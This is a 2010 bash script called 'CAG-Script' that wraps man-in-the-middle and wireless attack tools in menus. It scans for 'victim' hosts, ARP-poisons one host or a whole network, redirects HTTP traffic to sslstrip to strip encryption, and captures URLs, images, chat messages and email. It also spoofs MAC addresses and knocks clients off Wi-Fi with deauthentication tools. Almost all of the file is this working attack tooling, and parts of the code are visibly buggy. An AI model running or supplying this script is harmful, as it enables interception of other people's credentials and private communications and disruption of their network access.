#!/bin/bash #CAG-Script v0.4 #Script by CAG (aka BobaFett) #May 2010 (updated June 2010) #To run script, modify the "Customizable Variables" section to meet your needs, make it executable using chmod, or simply right click->properties->permissions->check "is executable", then change to the appropriate directory and type ./CAG-Script in terminal. #I recommend you run this script on BT4. You will need to install some other programs (like airdrop-ng) if you wish to use them #On a BT4 live cd I suggest you run my Airdrop-ng install script which will be posted on Pastebin shortly and then integrated into this script ############### Customizable Variables ################ #You must change these to meet your system needs export MACSPOOF="00:11:22:33:44:55" #Mac that macchanger defaults too. Can be any mac address export WIFIMAN="wlan0" #your card interface (i.e. wlan0, eth0, etc) export WIFIMON="mon0" #virtual "monitor mode" interface created using Airmon-ng export TERMINAL="xterm" #Your terminal emulator of choice (i.e. xterm, terminator, etc) export SSLSTRIPPORT="8080" #This can be any (small) number you choose export SSLOPTIONS="-k -f -l $SSLSTRIPPORT" #Sslstrip options, run "driftnet -h" for help export SSLSTRIPLOC=".../.sslstrip-0.7" #Location off sslstrip.py export DRIFTNETOUT=".../Pics" #Where Driftnet stores captured images export DRIFTNETOPTIONS="-a -d" #Driftnet options, run "driftnet -h" for help export DROPRULES="/root/rules" #Airdrop-ng drop rules. You can edit this file "realtime" during the program export TEXTEDITOR="kate" #Any gui text editor (i.e. kate, geany, etc) export DEFAULTAIRODUMPOUT="/root/test" #Airodump output file location export VICTIMIP="192.168.1.2" #default victim, you can change this temporarilly during the script ############### Customizable Variables ################ ################## Static Variables ################### #Don't change any of these variables unless you know what you're doing export ROOT_UID=0 export E_NOTROOT=87 export SSLSTRIPRUN=0 export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2) export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') export SELFIP=$(echo $ip_addr_str|cut -d ' ' -f 9) export SELFMAC=$(ifconfig ${self_ip_dev}|grep 'HWaddr'|cut -c 39-55) export fileout=false export fileout_path='./macs' export ipblocks=51 export tmpfile=$(tempfile) export self_ip_dev=$(echo $ip_addr_str|cut -d ' ' -f 3) ################## Static Variables ################### ###################### Functions ###################### Configmenufunc() { echo "1-6 are temporary. 7 is permanent." echo echo "1) Set Wireless/Wired interface (current: $WIFIMAN)" echo "2) Set gui text editor (current: $TEXTEDITOR)" echo "3) Set sslstrip options (current: $SSLOPTIONS)" echo "4) Set Driftnet output location (current: $DRIFTNETOUT" echo "5) Set Driftnet options (current: $DRIFTNETOPTIONS" echo "6) Set terminal emulator (current: $TERMINAL)" echo "7) Modify CAG-Script source" echo "8) Exit" echo "9) < Return to main menu" while [ 1 ] do read Configmenufunccase case "$Configmenufunccase" in "1") clear echo "Type Wireless/Wired interface (i.e Wlan0):" read WIFIMAN export $WIFIMAN Configmenufunc ;; "2") clear echo "Type gui text editor (i.e kate):" read TEXTEDITOR export $TEXTEDITOR Configmenufunc ;; "3") clear echo "Type sslstrip options (i.e. -k -f -l 8080):" read SSLOPTIONS export $SSLOPTIONS Configmenufunc ;; "4") clear echo "Type Driftnet output location (i.e. /root/Pics):" read DRIFTNETOUT export $DRIFTNETOUT Configmenufunc ;; "5") clear echo "Type terminal emulator (i.e. xterm):" read TERMINAL export $TERMINAL Configmenufunc ;; "6") clear echo "Type terminal emulator (i.e. xterm):" read TERMINAL export $TERMINAL Configmenufunc ;; "7") clear echo "*WARNING* Do not modify any section of this file other than 'Customizable Variables' section unless you know what you're doing. All changes are permanent." $TEXTEDITOR CAG-Script clear Configmenufunc ;; "8") #exitfunc this needs to be written exit ;; "9") clear Mainmenufunc ;; esac done } export -f Configmenufunc scriptstartfunc() { echo "Initializing CAG-Script." sleep .3 clear echo "Initializing CAG-Script.." sleep .3 clear echo "Initializing CAG-Script..." sleep .5 clear } nmapscanfunc() { export GATEWAYLENGTH=$(expr length "$GATEWAYIP") if [ $GATEWAYLENGTH -eq "11" ] then export NMAPVICTIMFRONT=$(ip route show | grep default | awk '{ print $3}' | cut -c 1-10) export NMAPVICTIMEND="*" NMAPVICTIMS="${NMAPVICTIMFRONT}${NMAPVICTIMEND}" else echo "non-standard ‬ip length, type nmap victims manually, replacing last digit(s) with '*' (i.e. 192.168.1.*)" read NMAPVICTIMS fi clear nmap -n -sP -oG ${tmpfile} $NMAPVICTIMS #>/dev/null ip_list=$(grep 'Status: Up' ${tmpfile}|cut -d ' ' -f 2 ) set $ip_list victim1=$1 victim2=$2 victim3=$3 victim4=$4 victim5=$5 victim6=$6 victim7=$7 victim8=$8 victim9=$9 } export -f nmapscanfunc choosevictimafternmapfunc() { if [ $victim1 -ne ] 2>/dev/null then echo -n else echo "1) $victim1" fi if [ $victim2 -ne ] 2>/dev/null then echo -n else echo "2) $victim2" fi if [ $victim3 -ne ] 2>/dev/null then echo -n else echo "3) $victim3" fi if [ $victim4 -ne ] 2>/dev/null then echo -n else echo "4) $victim4" fi if [ $victim5 -ne ] 2>/dev/null then echo -n else echo "5) $victim5" fi if [ $victim6 -ne ] 2>/dev/null then echo -n else echo "6) $victim6" fi if [ $victim7 -ne ] 2>/dev/null then echo -n else echo "7) $victim7" fi if [ $victim8 -ne ] 2>/dev/null then echo -n else echo "8) $victim8" fi if [ $victim9 -ne ] 2>/dev/null then echo -n else echo "9) $victim9" fi echo "choose victim IP:" while [ 1 ] do read Nmapscancase case "$Nmapscancase" in "1") export VICTIMIP=$victim1 break ;; "2") export VICTIMIP=$victim2 break ;; "3") export VICTIMIP=$victim3 break ;; "4") export VICTIMIP=$victim4 break ;; "5") export VICTIMIP=$victim5 break ;; "6") export VICTIMIP=$victim6 break ;; "7") export VICTIMIP=$victim7 break ;; "8") export VICTIMIP=$victim8 break ;; "9") export VICTIMIP=$victim9 break ;; esac done } export -f choosevictimafternmapfunc arghelp() { Usage: $0 ./CAG-Script [args] echo" -h, --help - Print this help and exit" echo" -i. --iface - Interface to use" echo" -v, --victim - IP address of desired host" echo" -g, --gateway - IP address of network gateway" } export -f arghelp argfunc() { export -f arghelp while [ $# -gt 0 ] do case "$1" in "-h"|"--help") help exit ;; "-v"|"--victim") export VICTIMIP="$2" ;; "-g"|"--gw") export GATEWAYIP="$2" ;; "-i"|"--iface") if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then die "Error: interface "$2" does not exist!" else iface="-i $2" fi ;; esac shift done } export -f argfunc rootcheck() { if [ "$UID" -ne "$ROOT_UID" ] then echo "Must be root to run this script." exit $E_NOTROOT fi } export -f rootcheck ipforwardstartfunc() { echo 1 > /proc/sys/net/ipv4/ip_forward } export -f ipforwardstartfunc ipforwardstopfunc() { while [ $(cat /proc/sys/net/ipv4/ip_forward) == 1 ] do echo 0 > /proc/sys/net/ipv4/ip_forward done } export -f ipforwardstopfunc checkconnectionfunc() { export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')" if [ $GATEWAYIP -ne ] then echo "No internet available :(" export connectionvar=0 else export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')" export VICTIMIP="/${IP1}${IP2}/" echo "We've got internet" export connectionvar=1 exit fi } essidfunc() { export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2) echo "connected to $ESSIDVAR" } exitfunc() { echo 0 > /proc/sys/net/ipv4/ip_forward killall sslstrip 2>/dev/null pkill sslstrip 2>/dev/null iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain } export -f exitfunc sslstripexitfunc() { iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain } export -f sslstripexitfunc chooseettercapvictim() { echo "Complete victim IP:" echo "leave blank and press enter to spoof entire network" echo -n "192.168." && read IP2 IP1=192.168. if [ $IP2 -eq ] then export VICTIMIP="//" export GATEWAYIP="//" echo "spoofing entire network..." echo "press q to re-arp victims" else export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') export VICTIMIP="/${IP1}${IP2}/" fi } export -f chooseettercapvictim choosearpspoofvictim() { echo "Complete victim IP:" echo "leave blank and press enter to spoof entire network" echo -n "192.168." && read IP2 IP1=192.168. if [ $IP2 -eq ] then export VICTIMIP=" " export TARGETOPTION=" " echo "spoofing entire network..." else export VICTIMIP=${IP1}${IP2} export TARGETOPTION="-t" echo $VICTIMIP fi } export -f choosearpspoofvictim ettercapfunc() { echo "1) Run Arp-Poisoning attack against $VICTIMIP" echo "2) Spoof entire network (this will drastically slow down large networks)" echo "3) Manually type victim IP" echo "4) Scan for victims using Nmap" echo "5) < Return to MITM menu" echo "6) exit" while [ 1 ] do read restartettercapmenu case "$restartettercapmenu" in "1") echo " " echo "...starting Ettercap-Ng, press q to stop attack..." echo " " ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/ export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') ettercapfunc ;; "2") echo " " echo "...starting Ettercap-Ng, press q to stop attack..." echo " " ettercap -T -i $WIFIMAN -Tq -M ARP // // export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') ettercapfunc ;; "3") echo " " echo "...starting Ettercap-Ng, press q to stop attack..." echo " " chooseettercapvictim ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ $VICTIMIP export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') ettercapfunc ;; "4") nmapscanfunc choosevictimafternmapfunc echo " " echo "...starting Ettercap-Ng, press q to stop attack..." echo " " export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/ ettercapfunc ;; "5") clear MITMattackmenufunc ;; "6") exit ;; esac done } export -f ettercapfunc arpspooffunc() { echo "1) Run Arp-Poisoning attack against $VICTIMIP" echo "2) Spoof entire network (this will drastically slow down large networks)" echo "3) Manually type victim IP" echo "4) Scan for victims using Nmap" echo "5) < Return to MITM menu" echo "6) exit" while [ 1 ] do read restartarpspoofmenu case "$restartarpspoofmenu" in "1") echo " " echo "...starting Arpspoof, press ctrl-c to stop attack..." echo " " ipforwardstartfunc arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP arpspooffunc ;; "2") echo " " echo "...starting Arpspoof, press ctrl-c to stop attack..." echo " " ipforwardstartfunc arpspoof -i $WIFIMAN $GATEWAYIP arpspooffunc ;; "3") choosearpspoofvictim echo echo "...starting Arpspoof attack, press ctrl-c to stop attack..." echo ipforwardstartfunc arpspoof -i $WIFIMAN $TARGETOPTION $VICTIMIP $GATEWAYIP arpspooffunc ;; "4") nmapscanfunc choosevictimafternmapfunc echo echo "...starting Arpspoof attack, press ctrl-c to stop attack..." echo ipforwardstartfunc arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP arpspooffunc MITMattackmenufunc ;; "5") MITMattackmenufunc ;; "6") exit ;; esac done } export -f arpspooffunc urlsnarffunc() { ipforwardstartfunc urlsnarf -i $WIFIMAN } export -f urlsnarffunc driftnetfunc() { ipforwardstartfunc driftnet -i $WIFIMAN $DRIFTNETOPTIONS $DRIFTNETOUT echo "Driftnet killed, delete captured images? (yes,no)" read driftnetdeleteopt if [ $driftnetdeleteopt -eq yes ] then rm -r $DRIFTNETOUT mkdir $DRIFTNETOUT else exit fi } export -f driftnetfunc webspyfunc() { echo "not complete" } export -f webspyfunc msgsnarffunc() { ipforwardstartfunc msgsnarf -i wlan0 } export -f msgsnarffunc mailsnarffunc() { ipforwardstartfunc mailsnarf -i wlan0 } export -f mailsnarffunc sslstripfunc() { #if [ "$SSLSTRIPRUN" -eq "0" ] #then iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIPPORT # SSLSTRIPRUN=1 #fi #ipforwardstartfunc echo 1 > /proc/sys/net/ipv4/ip_forward cd $SSLSTRIPLOC #$TERMINAL --execute bash -c "cd $SSLSTRIPLOC && cat sslstrip.log ; bash" & python sslstrip.py $SSLOPTIONS 2> /dev/null } export -f sslstripfunc tcpkillfunc() { echo "not complete" } export -f tcpkillfunc MITMhelpfunc() { clear echo "CHoose program manual to read:" echo "1) Ettercap-ng" echo "2) Arpspoof" echo "3) Urlsnarf" echo "4) Driftnet" echo "5) Webspy" echo "6) Msgsnarf" echo "7) Mailsnarf" echo "8) Sslstrip" echo "9) Tcpkill" echo "10) < Return to MITM menu" while [ 1 ] do read MITMhelpcase case "$MITMhelpcase" in "1") ettercap -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "2") arpspoof -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "3") urlsnarf -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "4") driftnet -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "5") webspy -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "6") msgsnarf -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "7") mailsnarf -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "8") cd $SSLSTRIPLOC python sslstrip.py -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "9") tcpkill -h echo "Press enter to return to help menu:" read MITMHELPVAR clear MITMattackmenufunc ;; "10") clear MITMattackmenufunc ;; esac done } export -f MITMhelpfunc MITMattackmenufunc() { clear echo "Choose program:" echo "1) Ettercap" echo "2) Arpspoof" echo "3) Urlsnarf" echo "4) Driftnet" echo "5) Webspy (not working yet...)" echo "6) Msgsnarf" echo "7) Mailsnarf" echo "8) Sslstrip" echo "9) Tcpkill" echo "10) Help" echo "11) < Return to main menu" while [ 1 ] do read MITMattackmenucase case "$MITMattackmenucase" in "1") $TERMINAL --execute bash -c "ettercapfunc ; bash" & clear MITMattackmenufunc ;; "2") $TERMINAL --execute bash -c "arpspooffunc ; bash" & clear MITMattackmenufunc ;; "3") $TERMINAL --execute bash -c "urlsnarffunc ; bash" & clear MITMattackmenufunc ;; "4") $TERMINAL --execute bash -c "driftnetfunc ; bash" & clear MITMattackmenufunc ;; "5") $TERMINAL --execute bash -c "webspyfunc ; bash" & clear MITMattackmenufunc ;; "6") $TERMINAL --execute bash -c "msgsnarffunc ; bash" & clear MITMattackmenufunc ;; "7") $TERMINAL --execute bash -c "mailsnarffunc ; bash" & clear MITMattackmenufunc ;; "8") $TERMINAL --execute bash -c "sslstripfunc ; bash" & MITMattackmenufunc ;; "9") clear MITMattackmenufunc ;; "10") $TERMINAL --execute bash -c "tcpkillfunc ; bash" & clear MITMhelpfunc ;; "11") clear Mainmenufunc ;; esac done } export -f MITMattackmenufunc Mainmenufunc() { echo "Choose type of attack:" echo "1) MITM attack" echo "2) Passive sniffing and probing" echo "3) Deauth/Dos attack" echo "4) Config" echo "5) Help" echo "6) Exit" while [ 1 ] do read Mainmenucase case "$Mainmenucase" in "1") clear MITMattackmenufunc Mainmenufunc ;; "2") clear Passivesniffingmenufunc Mainmenufunc ;; "3") clear Deauthmenu Mainmenufunc ;; "4") clear Configmenufunc ;; "5") clear echo "No help yet, sorry..." Mainmenufunc ;; "6") exit ;; esac done } Passivesniffingmenufunc() { echo "Choose program to run:" echo "1) Wireshark" echo "2) Zenmap" echo "3) EtherApe" echo "4) Angry IP Scanner" echo "5) ifconfig" echo "6) iwconfig" echo "7) Help" echo "8) Exit" echo "9) < Return to main menu" while [ 1 ] do read Passivesniffingmenucase case "$Passivesniffingmenucase" in "1") wireshark 2> /dev/null & clear Passivesniffingmenufunc ;; "2") zenmap 2> /dev/null & clear Passivesniffingmenufunc ;; "3") etherape -i $WIFIMAN 2> /dev/null & clear Passivesniffingmenufunc ;; "4") /usr/bin/ipscan 2> /dev/null & clear Passivesniffingmenufunc ;; "5") ifconfig Passivesniffingmenufunc ;; "6") iwconfig Passivesniffingmenufunc ;; "7") clear echo "No help, sorry..." Passivesniffingmenufunc ;; "8") #exitfunc this needs to be written exit ;; "9") Mainmenufunc ;; esac done } export Passivesniffingmenufunc Macchangerfunc() { echo "1) Spoof Mac address to $MACSPOOF" echo "2) Manually type Mac address" echo "3) Random Mac address" echo "4) Run custom command" echo "5) Help" echo "6) < Return to main menu" while [ 1 ] do read CHOICE1 case "$CHOICE1" in "1") ifconfig $WIFIMAN down macchanger $WIFIMAN -m $MACSPOOF ifconfig $WIFIMAN up echo Mainmenufunc ;; "2") echo "Type new fake mac address: (i.e. 00:11:22:33:44:55)" read MACINTCUSTOM ifconfig $WIFIMAN down macchanger $WIFIMAN -m $MACINTCUSTOM ifconfig $WIFIMAN up echo Mainmenufunc ;; "3") macchanger $WIFIMAN -r echo Mainmenufunc ;; "4") echo "Type custom macchanger command:" ifconfig $WIFIMAN down echo -n "macchanger $WIFIMAN" && read $CUSTOMMACCHANGEROPTONS macchanger $WIFIMAN $CUSTOMMACCHANGEROPTONS ifconfig $WIFIMAN up clear Mainmenufunc ;; "5") clear Mainmenufunc ;; "6") clear Mainmenufunc ;; esac done } export -f Macchangerfunc Deauthmenu() { echo "Choose program to run:" echo "1) Airdrop-ng" echo "2) Tuxcut" #echo "3) " #echo "4) " #echo "5) " #echo "6) " #echo "7) " echo "3) Help" echo "4) Exit" echo "5) < Return to main menu" while [ 1 ] do read Deauthmenucase case "$Deauthmenucase" in "1") $TERMINAL --execute bash -c "Airdropngfunc ; bash" & clear Passivesniffingmenufunc ;; "2") tuxcut & clear Passivesniffingmenufunc ;; "3") echo "No help yet, sorry..." Passivesniffingmenufunc ;; "4") #exitfunc this needs to be written exit ;; "5") Mainmenufunc ;; esac done } export -f Deauthmenu Airdropngfunc() { rm /root/*.csv 2> /dev/null #cleaning up csv from previous run 2> /dev/null echo "1) use default output location ($DEFAULTAIRODUMPOUT)" echo "2) choose airodump output name" echo "3) quit" while [ 1 ] do read CHOICE3 case "$CHOICE3" in "1") airoout="$DEFAULTAIRODUMPOUT" break ;; "2") echo "output name: (i.e. $DEFAULTAIRODUMPOUT)" read airoout echo $airoout ;; "3") rm $airoout*.csv 2> /dev/null #cleaning up csv from previous run exit ;; esac done echo "starting airodump-ng on $WIFIMAN" $TERMINAL --geometry=1024x576 --execute bash -c "airodump-ng $WIFIMAN -w $airoout --output-format csv ; bash" 2> /dev/null & $TEXTEDITOR $DROPRULES airdrop-ng -i $WIFIMAN -t $airoout-01.csv -r $DROPRULES -b -p } export -f Airdropngfunc ###################### Functions ###################### #################### Main Program ##################### clear rootcheck argfunc scriptstartfunc Mainmenufunc #################### Main Program #####################